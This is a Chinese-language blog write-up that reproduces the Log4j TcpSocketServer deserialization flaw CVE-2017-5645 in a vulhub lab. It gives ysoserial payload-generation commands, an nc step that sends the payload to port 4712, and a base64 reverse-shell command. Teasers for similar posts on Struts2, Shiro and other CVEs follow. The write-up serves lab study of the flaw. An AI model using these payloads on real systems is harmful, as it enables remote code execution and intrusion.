Log4j 反序列化命令执行漏洞 CVE-2017-5645

发表于2026-02-08|更新于2026-03-15|漏洞

|总字数:406|阅读时长:1分钟

影响范围

Apache Log4j 2.0-alpha1 - 2.8.1

漏洞类型

Java 反序列化

操作系统限制

无

配置要求

启动 Log4j 的 TcpSocketServer 服务，监听 4712 端口（也可指定其他端口）

漏洞利用

命令执行，反弹 shell，植入木马

利用原理

Log4j 的 TcpSocketServer 和 UdpSocketServer 类中，在接收日志数据时，没有对数据进行安全检验，直接通过 ObjectInputSteam.readObject() 进行反序列化，攻击者可以构造被序列化的恶意对象链来实现命令执行

漏洞复现

用现成的 vulhub 来拉取镜像

#下载vulhub源代码
git clone https://github.com/vulhub/vulhub.git
#进入漏洞目录
cd vulhub/log4j/CVE-2017-5645
#拉取镜像
docker-compose up -d

1773547936873

扫描靶机端口 4712，用 telnet 连接成功连接，说明端口开放

1 2	telnet 公网ip 被扫描端口 nc -zv 公网ip 被扫描端口

1773547983473

下载攻击工具并检查是否有 Java 环境

1
2
3

wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar -O ysoserial.jar
#检查Java环境
java -version

1773548027183

使用工具工具构造 payload，这里执行 touch /tmp/success

1	java -jar ysoserial.jar 利用的攻击链（这里用CommonsCollection6，） "执行的命令" > 文件名.bin

1773548059369

使用 nc 将二进制文件传到靶机

1	nc -v 靶机ip 4712 < 工具构造的文件名.bin

1773548115605

进入容器查看 /tmp，发现存在 success，说明成功执行命令

1773548142489

进行反弹 shell，使用 nc，nc -lvvp 监听端口

1773548171530

构造攻击 payload，将执行命令替换成下面这条

1	bash -c {echo,反弹shell的base64编码}\|{base64,-d}\|{bash,-i}

1773548204015

用 nc 将二进制文件传入靶机

1773548245345

成功连接

1773548278116

文章作者: Johan

文章链接: https://cjh-1001.github.io/2026/02/08/CVE-2017-5645/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Johan的秘密小窝！

相关推荐

Struts2 远程代码执行漏洞 CVE-2018-11776

影响范围 Struts 2.3 – 2.3.34 Struts 2.5 – 2.5.16 漏洞类型OGNL 表达式注入操作系统限制无配置要求 alwaysSelectFullNamespace 设置为 true package 标签未定义 namespace 或使用了通配符漏洞利用执行命令，可以执行各种敏感操作，例如任意文件读取，植入木马，内网探测利用原理Struts2 将 URL 路径中的 namespace 当作 OGNL 表达式，在重定向跳转时对其进行二次解析，执行敏感命令。Struts2 中的 URL 结构通常为 http://域名/命名空间/Action 名.action，如果攻击者访问不存在的命名空间，且配置了 alwaysSelectFullNamespace = true，那么会将攻击者注入的 payload 提取出来，将动态变量赋值为攻击 payload，OGNL 引擎解析命名空间时候执行了恶意 payload 漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com...

Tomcat 文件包含漏洞 CVE-2020-1938

影响范围 Apache Tomcat 6.x (全版本受影响) Apache Tomcat 7.0.0 - 7.0.99 Apache Tomcat 8.5.0 - 8.5.50 Apache Tomcat 9.0.0.M1 - 9.0.30 漏洞类型二进制解析漏洞操作系统限制无配置要求8009 端口打开漏洞利用任意文件读取，例如读取 WEB - INF / web.xml 文件，只能读取使用 AJP 目录下的文件文件包含，RCE 远程代码执行，可以是反弹 shell 利用原理 AJP 协议默认监听端口通常缺乏认证，利用协议缺陷，伪造 javax.servlet.include 属性漏洞复现12#拉取镜像docker run -d -p 8082:8080 -p 8009:8009 --name ghostcat-vulhub vulhub/tomcat:9.0.30 使用云服务器： 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495...

Spring Cloud Function 远程代码执行漏洞 CVE-2022-22963

影响范围 Spring Cloud Function 3.0.0 - 3.1.6 Spring Cloud Function 3.2.0 - 3.2.2 漏洞类型 SpEL 表达式注入操作系统限制无配置要求默认配置漏洞利用命令执行，进行反弹 shell，写入木马利用原理Spring Cloud Function 引入 RoutingFunction 功能，允许开发者根据特定条件动态将请求分发给不同函数执行，框架允许通过 HTTP Header 来指定路由逻辑。当请求到达时，RoutingFunction 会检查是否存在特定 HTTP 请求头：spring.cloud.function.routing-expression，如果存在该 Header，框架会将其值作为 SpEL 表达式处理，攻击者可以构造恶意 payload 注入到 spring.cloud.function.routing-expression 属性值，服务器处理 POST 请求时候，识别到恶意 payload 就会触发解析，执行恶意命令。POST 请求主体不能为空，若为空，Spring 的 Messag...

Nginx 整数溢出漏洞 CVE-2017-7529

影响范围 Nginx 0.5.6 - 1.13.2 漏洞类型整数溢出操作系统限制无配置要求Nginx 开启了缓存功能漏洞利用信息泄露利用原理Nginx 处理 Range 请求的模块计算请求范围时候使用了 64 位有符号整数，在计算多段请求时候，Nginx 会计算总的返回长度，攻击者通过给出接近 64 位整数机选大数字，两个负数相减或正数相加，结果超过 64 位整数能表示的最大范围，这个数值在计算机内部发生了溢出。当 Nginx 开启了缓存，存文件的格式不是纯文本，而是包含 KEY、过期时间、后端服务器信息，后端返回的原始头信息，以及真正的网页内容，由于漏洞导致的整数溢出（没做边界检验），攻击者构造负数起始位置，在通过整数溢出使得请求变得合理（大整数与负数相加后整数溢出变成极小的数，极小的数小于实际文件总长，使服务器认为请求合理），Nginx 内部计算的原始读取位置发生了偏移，可以让出错的指针刚好落到缓存头区域，进而读到缓存的内容漏洞复现现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vu...

Shiro 反序列化漏洞 CVE-2016-4437

影响范围 Apache Shiro 1.0.0 - 1.2.4 部分集成过时 Shiro 组件的第三方框架 / 脚手架漏洞类型Java 反序列化操作系统限制无配置要求默认配置漏洞利用反弹 shell 利用原理在 Shiro1.2.4 及以前的版本中，AbstractRememberMeManager 类在代码中硬编码了 AES-128-CBC 加密的密钥 kPH + bIxk5D2deZiIxcaaaA==，意味着所以使用默认配置的 Shiro 系统用同一个密钥进行加解密 Cookie。Shiro 方便用户在关闭浏览器保持登录状态（RememberMe 逻辑），将用户身份序列化后存入 Cookie，当用户再次访问，服务器回自动读取并反序列化还原对象。解密 Cookie 后，Shiro 直接调用 Java 的 ObjectInputStream.readObject() 来还原对象，密钥对还原对象类型进行安全防护。攻击者在 Cookie 中注入精心构造的恶意代码，Shiro 拦截含 rememberMe 字段的 HTTP 请求，恶意代码经过 base64 解码再用 AES...

Struts2 远程命令执行漏洞 CVE-2021-31805

影响范围 Struts 2.0.0 - 2.5.29 漏洞类型OGNL 表达式注入操作系统限制无配置要求默认配置漏洞利用执行命令，可以执行各种敏感操作，例如任意文件读取，植入木马，内网探测利用原理Struts 内部对象虽然被锁死了，但是 Struts2 运行在 Tomcat 容器，攻击者可以利用 Tomcat 的 InstanceManager 绕过沙箱（相当于 CVE-2021-31805 是对 CVE-2020-17530 修复的绕过），InstanceManager 新建的 org.apache.commons.collections.BeanMap 对象能绕过普通权限检查，直接操作 memberAccess 的私有属性，利用 BeanMap 的 put 方法把 excludedClasses（Struts2 内部的黑名单）改为空，再通过攻击链执行敏感命令。漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhub/vulhub.git#进入漏洞目录cd vulhub/s...

评论

数据加载中